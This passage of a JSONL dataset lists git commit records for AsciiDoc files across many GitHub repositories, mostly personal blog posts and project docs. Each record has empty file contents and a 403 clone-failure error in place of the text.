search,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,kalimatas\/elasticsearch,MisterAndersen\/elasticsearch,rlugojr\/elasticsearch,mohit\/elasticsearch,elasticdog\/elasticsearch,i-am-Nathan\/elasticsearch,umeshdangat\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,s1monw\/elasticsearch,spiegela\/elasticsearch,LewayneNaidoo\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,strapdata\/elassandra,i-am-Nathan\/elasticsearch,ZTE-PaaS\/elasticsearch,StefanGor\/elasticsearch,winstonewert\/elasticsearch,mikemccand\/elasticsearch,elasticdog\/elasticsearch,rlugojr\/elasticsearch,nazarewk\/elasticsearch,obourgain\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,brandonkearby\/elasticsearch,C-Bish\/elasticsearch,henakamaMSFT\/elasticsearch,coding0011\/elasticsearch,mortonsykes\/elasticsearch,winstonewert\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/java-api\/docs\/bulk.asciidoc","new_file":"docs\/java-api\/docs\/bulk.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"826a19be6d46229ff0c6df568bdcc96e516ce079","subject":"Add code of conduct.","message":"Add code of conduct.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00fdc1fc727de9279b5bd8eb58a3748d3862ecfd","subject":"Example 004: adoc","message":"Example 004: adoc","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"example\/004_Library\/doc\/004.adoc","new_file":"example\/004_Library\/doc\/004.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrunoEberhard\/minimal-j.git\/': The 
requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a74f1190fc5918bd8b3c68e4704feb5ad9293453","subject":"Update 2015-12-22-Protecting-a-REST-API-using-Auth0-and-Vertx.adoc","message":"Update 2015-12-22-Protecting-a-REST-API-using-Auth0-and-Vertx.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-12-22-Protecting-a-REST-API-using-Auth0-and-Vertx.adoc","new_file":"_posts\/2015-12-22-Protecting-a-REST-API-using-Auth0-and-Vertx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80f9b43668f4ef5ce514f20bc0ccb34384b7902c","subject":"APPNG-2005 add contributing file","message":"APPNG-2005 add contributing file\n","repos":"appNG\/appng,appNG\/appng,appNG\/appng","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/appNG\/appng.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e7275517e741303c3b90c8d99b722767770436e","subject":"Add CONTRIBUTING.adoc (#2493)","message":"Add CONTRIBUTING.adoc (#2493)\n\n* Created a contribution doc\r\n\r\ntrying...\r\n\r\n* Delete CONTRIBUTIONS.adoc\r\n\r\n* did some changes\r\n\r\n* Update CONTRIBUTION.adoc\r\n\r\ndid the required changes\r\n\r\n* Update CONTRIBUTION.adoc\r\n\r\nRemoved incorrect text, from Robot Framework, and added commands to start and debug RIDE.\r\n\r\n* Update CONTRIBUTION.adoc\r\n\r\nFinal changes to document.\r\n\r\nCo-authored-by: H\u00e9lio Guilherme <b9ad1ef9ecca8d1018e23234ae0cf851388f5100@gmail.com>","repos":"HelioGuilherme66\/RIDE,robotframework\/RIDE,robotframework\/RIDE,HelioGuilherme66\/RIDE,HelioGuilherme66\/RIDE,robotframework\/RIDE,HelioGuilherme66\/RIDE,robotframework\/RIDE","old_file":"CONTRIBUTION.adoc","new_file":"CONTRIBUTION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HelioGuilherme66\/RIDE.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c239c8faf20d2a6ea153eedccfc7c7f9d0f16729","subject":"Update 2017-03-08-Nuestro-nuevo-proyecto-ya-esta-en-marcha.adoc","message":"Update 2017-03-08-Nuestro-nuevo-proyecto-ya-esta-en-marcha.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2017-03-08-Nuestro-nuevo-proyecto-ya-esta-en-marcha.adoc","new_file":"_posts\/2017-03-08-Nuestro-nuevo-proyecto-ya-esta-en-marcha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b7a629b6ef60cdfd4ba8a8b7830493cd95adacd","subject":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e17c97331d6b822eb90f4ddd59d1485dd6385923","subject":"Update 2015-07-10-Partially-Applied-Functions-vs-Currying.adoc","message":"Update 2015-07-10-Partially-Applied-Functions-vs-Currying.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-07-10-Partially-Applied-Functions-vs-Currying.adoc","new_file":"_posts\/2015-07-10-Partially-Applied-Functions-vs-Currying.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hhimanshu\/hhimanshu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a1421cd006130465b84010e3ddaf3016ce0dba6","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"381c266caf7244dcc1c7bbde332aba7b0d39a9a1","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16bd55ab5b788e91d9e93d0773428544244b5b84","subject":"Include technical documentation on status quo","message":"Include technical documentation on status quo\n","repos":"KestrelComputer\/kestrel,KestrelComputer\/kestrel,sam-falvo\/kestrel,KestrelComputer\/kestrel,sam-falvo\/kestrel,8l\/kestrel,8l\/kestrel,8l\/kestrel,8l\/kestrel,sam-falvo\/kestrel,8l\/kestrel,sam-falvo\/kestrel,KestrelComputer\/kestrel,8l\/kestrel","old_file":"cores\/Kestrel-2\/sw\/sts\/doc\/technical-reference-manual.asciidoc","new_file":"cores\/Kestrel-2\/sw\/sts\/doc\/technical-reference-manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sam-falvo\/kestrel.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"e13b0ccca4e6162546b861383b5e87721f6bfdd9","subject":"Added news\/2015-12-24-forge-3.0.0.beta1.asciidoc","message":"Added news\/2015-12-24-forge-3.0.0.beta1.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2015-12-24-forge-3.0.0.beta1.asciidoc","new_file":"news\/2015-12-24-forge-3.0.0.beta1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} 
{"commit":"ba9f1cd4b3121fb5300687ca349477db7e0e6a7f","subject":"Update 2015-10-11-MapReduce-Tutorial.adoc","message":"Update 2015-10-11-MapReduce-Tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-MapReduce-Tutorial.adoc","new_file":"_posts\/2015-10-11-MapReduce-Tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccd101454722537664762199fafb60da03fb1d99","subject":"Update 2016-09-04-JSO-Ntatham-Part-1.adoc","message":"Update 2016-09-04-JSO-Ntatham-Part-1.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-09-04-JSO-Ntatham-Part-1.adoc","new_file":"_posts\/2016-09-04-JSO-Ntatham-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f040e6600e54d07b5979fa7bd035363e1203f61d","subject":"Create dev_env.adoc","message":"Create dev_env.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/dev_env.adoc","new_file":"docs\/dev_env.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c569c81fab5606aa28196e4018d0b0c3bc3765b","subject":"Update 2015-02-05-new-Blog.adoc","message":"Update 2015-02-05-new-Blog.adoc","repos":"nanox77\/nanox77.github.io,nanox77\/nanox77.github.io,nanox77\/nanox77.github.io","old_file":"_posts\/2015-02-05-new-Blog.adoc","new_file":"_posts\/2015-02-05-new-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanox77\/nanox77.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a4bf448b6b795daeb2be2a54f8fbd582e2d98a4","subject":"Update 2014-07-24-How-to-ban-classes.adoc","message":"Update 2014-07-24-How-to-ban-classes.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2014-07-24-How-to-ban-classes.adoc","new_file":"_posts\/2014-07-24-How-to-ban-classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5452416d6def21e6a9d8f20e427a37263fdd4f8d","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"2a5f546a9aa28123438b39544f6293b4247f3a8c","subject":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","message":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad3069edffd0083fe58457dc769535af7d116358","subject":"Update 2015-07-29-Test-posting.adoc","message":"Update 2015-07-29-Test-posting.adoc","repos":"gendalf9\/gendalf9.github.io---hubpress,gendalf9\/gendalf9.github.io---hubpress,gendalf9\/gendalf9.github.io---hubpress","old_file":"_posts\/2015-07-29-Test-posting.adoc","new_file":"_posts\/2015-07-29-Test-posting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gendalf9\/gendalf9.github.io---hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adf2ccda201087f6795f73ec234ad9894b441ddb","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c5f9f7bb954f2b7a4e83c53a0dee5e7cf0b5f1d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1440b0adc3923f74d07a3b31c7c8089a7a081170","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4dffc717ca8a3fb669f2bf8d1a4d7fce1b4c4f3","subject":"Update 
2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"719945b182905c92c5bf501d5a4b62dd57fdfcbd","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1547acaee80f2e811360eff7daa8fc5626c7881e","subject":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","message":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"742678ab75812cf4e8578cafe868a7448cdfe580","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8e97664f24af64b6c77dd3964b7fbf4cb690000","subject":"Applied a few more changes","message":"Applied a few more changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a229bc56a74f473f18d5b6d2fc797da9336085e6","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/System Resource Usage Monitor 
(SRUM).asciidoc","new_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c81f4f6a0c05387214671dbeab35605eec21d40a","subject":"Update 2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","message":"Update 2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","new_file":"_posts\/2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fe5de96fd1bb518209510e4b6fc3ed39c5b117f","subject":"Update 2016-12-07-Projet-Presidentielle-Francaise.adoc","message":"Update 2016-12-07-Projet-Presidentielle-Francaise.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-07-Projet-Presidentielle-Francaise.adoc","new_file":"_posts\/2016-12-07-Projet-Presidentielle-Francaise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72cd28bbd2b215326638c49ea4e01f8748a390f1","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ee5b3e38b4c710701808a319f8f4c572afbd25e","subject":"y2b create post Unboxing The World's Most Expensive iPhone Case","message":"y2b create post Unboxing The World's Most Expensive iPhone Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-12-Unboxing-The-Worlds-Most-Expensive-iPhone-Case.adoc","new_file":"_posts\/2017-02-12-Unboxing-The-Worlds-Most-Expensive-iPhone-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77ca1bc3c9beeb83f41f3c4d55035373072803c8","subject":"Deleted _posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","message":"Deleted 
_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f11f93001c77dd178eb2c1b0d36bc908165e1e5","subject":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"179ee1b900474033f62ea83dfb9db7b822e2eee2","subject":"Update 2017-02-DOGMA-SCHRIFT.adoc","message":"Update 2017-02-DOGMA-SCHRIFT.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-02-DOGMA-SCHRIFT.adoc","new_file":"_posts\/2017-02-DOGMA-SCHRIFT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0723e124b96eb28d087b6a4ca357b933a2f7f532","subject":"Update 2017-03-30-start-blog.adoc","message":"Update 2017-03-30-start-blog.adoc","repos":"chaseey\/chaseey.github.io,chaseey\/chaseey.github.io,chaseey\/chaseey.github.io,chaseey\/chaseey.github.io","old_file":"_posts\/2017-03-30-start-blog.adoc","new_file":"_posts\/2017-03-30-start-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chaseey\/chaseey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"319c29a869352e9a3d16b554eda155e81b4b8685","subject":"Update 2015-08-28-Script-for-recording-Winamp-visualizations.adoc","message":"Update 2015-08-28-Script-for-recording-Winamp-visualizations.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-08-28-Script-for-recording-Winamp-visualizations.adoc","new_file":"_posts\/2015-08-28-Script-for-recording-Winamp-visualizations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e90ad8b0a000f6b6849b2a0521ab1df5dcbc7492","subject":"Update 2018-04-10-Using-the-ovirt-vms-module-with-cloud-init.adoc","message":"Update 
2018-04-10-Using-the-ovirt-vms-module-with-cloud-init.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-04-10-Using-the-ovirt-vms-module-with-cloud-init.adoc","new_file":"_posts\/2018-04-10-Using-the-ovirt-vms-module-with-cloud-init.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90bdc76acdd16fc087b965bd6bf0e33114266f62","subject":"Update 2016-7-8.adoc","message":"Update 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-8.adoc","new_file":"_posts\/2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4f6ce4b91dd816ba220f42435c16289093cca95","subject":"Docs: fix some case problems in aliases.asciidoc (#23657)","message":"Docs: fix some case problems in aliases.asciidoc (#23657)\n\nMake more things 